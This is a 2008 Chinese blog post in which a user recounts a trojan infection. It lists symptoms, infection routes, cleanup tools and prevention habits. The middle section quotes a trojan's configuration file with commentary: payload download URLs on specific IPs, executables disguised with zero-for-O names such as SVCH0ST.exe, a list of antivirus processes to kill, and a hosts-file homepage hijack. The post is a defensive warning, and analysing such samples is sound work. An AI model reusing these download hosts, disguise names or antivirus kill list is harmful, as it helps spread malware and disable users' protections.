2008年12月28日

病毒和木马的一些伎俩

前天晚上下一个软件中招,昨天早上发现6个木马,一直到中午才保证系统安全,一直到今天才彻底清除。
下面结合这次的教训,谈谈一些个人体会,希望对大家有帮助。

一、怎样发现中招?
1、启动慢。
2、CPU或内存占用大,因而系统运行慢。
3、在任务管理器中,发现陌生的进程。
4、在c:\windows和c:\windows\system32目录下面,发现可疑的exe和dll程序。
5、注册表启动项有可疑加载项。
6、系统服务有可疑加载项。
7、IE首页被修改。
8、IE弹出可疑页面。
9、IE加载可疑插件。
10、在C:\Program Files\Internet Explorer目录下面,发现可疑的exe和dll程序。
11、C:\windows\system32\drivers\etc\hosts文件被修改,将SINA、SOHU等网站域名解析到病毒网站。


二、病毒和木马入侵的方式
1、打开病毒网页时,通过脚本入侵。
2、把病毒程序绑定到程序中,安装时加载病毒程序。
3、通过邮件的附件入侵。


三、下面我们看一下,一个典型木马的配置文件:
[DOWNLOADNUMS] //自动下载
updatetm=1   //间隔时间
downfile=11 //下载文件数
killproc=5 ! ;  //杀进程数

[STARTHTMPAGE]
;mainpage=http://www.sina.com.cn //把首页设为新浪,然后在HOSTS解析文件中,将www.sina.com.cn解析到病毒网站,这样每次打开IE时就强行进入病毒网站。

[DOWNMAINLIST]
mainfile=http://61.152.169.194/007/007.exe //下载主病毒文件

[DOWNFILELIST] //下载伪装的病毒文件,注意病毒文件往往以0代替系统文件的O。可以通过文件的时间标记来识别。
downfile1=http://60.169.1.29/007/ldasd.exe
downfile2=http://60.169.1.29/007/SVCH0ST.exe //伪装成SVCHOST.exe
downfile3=http://60.169.1.29/007/IEXPL0R.exe //IEXPLOER.exe
downfile4=http://60.169.0.66/007/SC0NFIG.exe //MSCONFIG.exe
downfile5=http://60.169.0.66/007/TIMPLATF0RM.exe //TIMPLATFORM.exe
downfile6=http://60.169.0.66/007/SPy.exe
downfile7=http://www.mygod88.com/007/IECONFIG.exe //IECONFIG.exe
downfile8=http://222.180.37.22/IECOFIG.EXE //IECONFIG.exe
downfile9=http://222.180.37.22/MCONFIG.EXE //MSCONFIG.exe
downfile10=http:/! /218.93.127.230/007/SPSJ.EXE
downfile11=http://218.93.127.2! 30/007/wanmeishijie.exe

[DOWNKILLLIST] //清除杀毒软件进程
killproc1=kav.exe //KAV
killproc2=rav.exe //瑞星
killproc3=avp.exe //avp
killproc4=kavsvc.exe //卡巴
killproc5=ravmon.exe //瑞星


四、清除木马的一些工具:
360安全卫士 www.safe360.com
超级兔子 http://www.superrsoft.com/cn/
木马克星 http://www.luosoft.com/
windows清理助手 http://www.arswp.com/
冰刀icesword http://www.blogcn.com/user17/pjf/index.html
unlocker http://www.crsky.com/soft/5890.html


五、预防木马,平时养成好习惯:
1、XP安装SP2,2000安装SP4,IE6.0。
2、系统自动更新,通过windows update或microsoft update,或者在线网站更新:
http://update.microsoft.com/windowsupdate/v6/default.aspx?ln=zh-cn
3、病毒库至少每周更新一次。
4、邮件的附件先保存查毒再打开,特别是.exe/.dll/.scr/.lnk/.com/.bat/.pif后缀的文件,其中:
.exe - 可执行程序
.dll - 可执行程序扩展
.scr - 封装成屏幕保护的EXE
.lnk - windows快捷方式
.com - DOS下的可执行程序
.bat - DOS下的批处理程序
.pif - DOS下的快捷方式
5、XP打开防火墙。
6、超载程序需谨慎,对于不放心的程序,扫描后再运行。
推荐的下载网站:
华军:www.newhua.com
天空:www.skycn.com
crsky: www.crsky.com

发帖者 tallrain 时间: 15:31:00

没有评论:

发表评论

订阅: 博文评论 (Atom)